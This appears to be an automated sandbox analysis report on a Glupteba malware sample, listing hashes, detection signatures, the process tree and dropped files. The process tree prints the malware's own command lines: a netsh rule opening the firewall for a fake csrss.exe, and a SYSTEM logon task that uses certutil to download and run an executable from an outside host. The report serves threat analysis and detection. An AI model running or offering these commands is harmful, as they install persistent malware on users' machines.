Analysis
-
max time kernel
15s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
24-05-2022 22:07
Static task
static1
Behavioral task
behavioral1
Sample
59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe
Resource
win7-20220414-en
General
-
Target
59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe
-
Size
3.8MB
-
MD5
be737bbd92519d634ee9f64ec3b921a9
-
SHA1
2f774c2aa118105f6c01a612323a36b130703616
-
SHA256
59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410
-
SHA512
41a0842892b1e9ba3fd4a776b6427539ca2f5907887ca6fc5d6e0c0f43b8a4354bebe0a005cde572d8a65871cf8167ec5fc3a31c1f159cfef443f07d657309e5
Malware Config
Signatures
-
Glupteba Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1940-56-0x0000000001600000-0x0000000001CF5000-memory.dmp family_glupteba behavioral1/memory/1940-57-0x0000000000400000-0x0000000000FE5000-memory.dmp family_glupteba -
Modifies Windows Firewall 1 TTPs
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 1440 bcdedit.exe -
Drops file in Windows directory 1 IoCs
Processes:
makecab.exedescription ioc process File created C:\Windows\Logs\CBS\CbsPersist_20220525000917.cab makecab.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1812 schtasks.exe 1744 schtasks.exe -
Modifies data under HKEY_USERS 1 IoCs
Processes:
netsh.exedescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exepid process 1940 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe 1704 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exedescription pid process Token: SeDebugPrivilege 1940 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe Token: SeImpersonatePrivilege 1940 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.execmd.exedescription pid process target process PID 1704 wrote to memory of 1064 1704 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe cmd.exe PID 1704 wrote to memory of 1064 1704 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe cmd.exe PID 1704 wrote to memory of 1064 1704 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe cmd.exe PID 1704 wrote to memory of 1064 1704 59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe cmd.exe PID 1064 wrote to memory of 1692 1064 cmd.exe netsh.exe PID 1064 wrote to memory of 1692 1064 cmd.exe netsh.exe PID 1064 wrote to memory of 1692 1064 cmd.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe"C:\Users\Admin\AppData\Local\Temp\59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe"C:\Users\Admin\AppData\Local\Temp\59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220525000917.log C:\Windows\Logs\CBS\CbsPersist_20220525000917.cab1⤵
- Drops file in Windows directory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
-
C:\Windows\rss\csrss.exeFilesize
893KB
MD54523032c8d2caeef06178f3854637376
SHA128686ee0e0d6776f19326a1222a68543437c1e26
SHA256515d77a416a7cb61ad0125458646ccedd2de49875da1728bb2b2c46919d617ca
SHA5120c85115ced443a096f2ea62025286d4f01dce874ffec58c22ea27b9ebb8ae44083742abbff6e4eb1609c9bf41c05426f5daf4e430c71ebfb1afed644277840d0
-
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
-
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
-
\Users\Admin\AppData\Local\Temp\dbghelp.dll
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
-
\Users\Admin\AppData\Local\Temp\osloader.exe
-
\Users\Admin\AppData\Local\Temp\osloader.exe
-
\Users\Admin\AppData\Local\Temp\osloader.exe
-
\Users\Admin\AppData\Local\Temp\symsrv.dll
-
\Windows\rss\csrss.exeFilesize
1.6MB
MD558a807deff122b95edeb0586095141f0
SHA1627fc9ac5f2ad5e81bd7d292e568f287014b2fde
SHA256c74751e268b059e9341684f5e7f097afa316c04c17d6a2ce7825a19db2598fd3
SHA512308183fbe8046fe66be115a8d2ea2b3f4dccd9624f913dba0499b5f81af9d398c2fb7dd1f99c3b6697da563715f7554ef4d9101c17dd3c50f23142f02efe5229
-
\Windows\rss\csrss.exeFilesize
2.4MB
MD5dc741515f1b67996d40ce6438019ba1d
SHA1bdf78779d6d70dfad0dcb8644ca6b049d53453ce
SHA2566c8ff236640f859eac5497e8f0f563dbe79dc3f595199027feae2913302d0d2c
SHA512dd9eb39fd211d305adf0da12c73511399edd04db8628b0f204ec745db39ca8c4c2b121574978db7ff3df4d835921961f032b6507efe6773c30a0e819d884fbcc
-
memory/1064-59-0x0000000000000000-mapping.dmp
-
memory/1440-83-0x0000000000000000-mapping.dmp
-
memory/1692-61-0x000007FEFC2E1000-0x000007FEFC2E3000-memory.dmpFilesize
8KB
-
memory/1692-60-0x0000000000000000-mapping.dmp
-
memory/1704-63-0x0000000000400000-0x0000000000FE5000-memory.dmpFilesize
11.9MB
-
memory/1704-62-0x00000000012C0000-0x0000000001666000-memory.dmpFilesize
3.6MB
-
memory/1704-58-0x00000000012C0000-0x0000000001666000-memory.dmpFilesize
3.6MB
-
memory/1940-54-0x0000000001250000-0x00000000015F6000-memory.dmpFilesize
3.6MB
-
memory/1940-57-0x0000000000400000-0x0000000000FE5000-memory.dmpFilesize
11.9MB
-
memory/1940-56-0x0000000001600000-0x0000000001CF5000-memory.dmpFilesize
7.0MB
-
memory/1940-55-0x0000000001250000-0x00000000015F6000-memory.dmpFilesize
3.6MB
-
memory/1952-70-0x0000000000400000-0x0000000000FE5000-memory.dmpFilesize
11.9MB
-
memory/1952-69-0x00000000011B0000-0x0000000001556000-memory.dmpFilesize
3.6MB
-
memory/1952-68-0x00000000011B0000-0x0000000001556000-memory.dmpFilesize
3.6MB
-
memory/1952-66-0x0000000000000000-mapping.dmp